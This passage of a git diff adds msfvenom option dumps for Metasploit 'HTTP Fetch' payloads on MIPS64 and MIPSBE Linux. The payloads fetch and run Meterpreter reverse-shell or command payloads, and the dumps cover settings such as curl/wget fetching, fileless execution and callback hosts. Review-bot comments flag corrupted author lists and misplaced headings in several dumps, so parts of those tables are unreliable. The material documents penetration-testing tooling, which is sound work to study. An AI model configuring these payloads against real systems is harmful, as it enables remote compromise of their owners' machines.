when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..c972f3e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_tcp.txt 
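Review bot: the `Provided by:` block in cmd-linux-http-mips64-meterpreter_reverse_https.txt is corrupted: it reads `B`, then the `Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_https:` banner with its `=====` rule, then a bare `@rapid7.com>` and `timwr`, so every author but the last has been lost and the evasion heading sits above the author list instead of above its own (empty) section, while the second options table after the Description carries no heading at all. That pattern suggests msfvenom's headings and tables were captured from two streams with different buffering; please regenerate with stdout and stderr captured separately (or the second stream discarded) and confirm each file shows a complete author list and a heading above its advanced-options table before this is merged.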
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mips64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME qPigzETmWu no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-exec.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-exec.txt new file mode 100644 index 0000000..2bd17b3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-exec.txt 
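Review bot: `FETCH_FILENAME qPigzETmWu` in cmd-linux-http-mips64-meterpreter_reverse_tcp.txt is a freshly generated random default, and `Total size: 108` tracks it (the sibling files in this patch show 105, 108 and 111 for 9-, 10- and 11-character names), so both fields will differ on every regeneration even when the module's options have not changed. Consider post-processing the dumps to replace the random name with a fixed placeholder and either dropping `Total size` or documenting that it is expected to churn; otherwise future diffs of these files will be mostly noise.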
@@ -0,0 +1,69 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/mipsbe/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME liEefdOwA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..b9fbad2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter-reverse_tcp.txt 
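Review bot: in cmd-linux-http-mipsbe-exec.txt `FETCH_SRVHOST` is marked Required `yes`, whereas every meterpreter variant in this patch marks it `no`; this is consistent rather than a dump error, since the exec module has no `LHOST` row for the fetch server to fall back on, but a one-line remark in the README would stop readers who diff these files from flagging it. Separately, the unbalanced parentheses in the `FETCH_FILELESS` description (`... Python ≥3.8 (Accepted: none, bash, python3.8+)`) are upstream msfvenom text and should stay as captured rather than being hand-edited in the dump.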
@@ -0,0 +1,100 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Norm +Evasion options for payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EjqTwHWHT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager 
should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..e0e9270 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_http.txt 
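Review bot: cmd-linux-http-mipsbe-meterpreter-reverse_tcp.txt shows the same interleaving damage: `Rank: Norm` is cut short, the `Provided by:` heading and the leading authors are gone, and the `Evasion options for payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp:` banner is printed directly after the rank with only `juan vazquez` and `tkmru` beneath it. Regenerate this file together with the others and verify `Rank: Normal` and a full author list before merging.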
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OJApyhagJby no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..0282c82 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_https.txt 
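Review bot: cmd-linux-http-mipsbe-meterpreter_reverse_http.txt has an empty `Provided by:` followed by the evasion banner and a truncated `ok@rapid7.com>` fragment above `timwr`, so the author list is unusable here as well, and the table after the Description again has no heading. This is the third file in the patch with the fault, so the fix belongs in the generation script rather than in hand edits to individual dumps.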
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ICLFrRDOUN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..d9f6ada --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_tcp.txt 
